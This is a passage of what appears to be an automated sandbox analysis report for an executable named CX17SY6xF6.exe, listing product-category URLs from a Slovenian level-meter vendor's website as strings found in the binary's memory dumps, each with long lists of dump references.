                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/jola-nivo-tekocin/prikazovalnik-toka-jola/
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/jola-nivo-tekocin/regulacija-nivoja/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/jola-nivo-tekocin/regulacija-nivoja/meritev
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/jola-nivo-tekocin/regulacija-nivoja/nivojsk
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/jola-nivo-tekocin/regulacija-nivoja/regulac
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/jola-nivo-tekocin/regulacija-nivoja/varnost
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/jola-nivo-tekocin/regulacija-nivoja/zvezna-
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/mollet-nivo-sipkih-materialov/
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/mollet-nivo-sipkih-materialov/dodatni-pribo
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/mollet-nivo-sipkih-materialov/inteligentni-
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/mollet-nivo-sipkih-materialov/membranski-ve
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/mollet-nivo-sipkih-materialov/mollet-molosc
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/mollet-nivo-sipkih-materialov/naprave-za-tl
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/mollet-nivo-sipkih-materialov/nivojska-stik
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/mollet-nivo-sipkih-materialov/zvezni-meriln
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/wika-merilniki-nivoja/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/wika-merilniki-nivoja/bypass-nivojno-ohisje
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 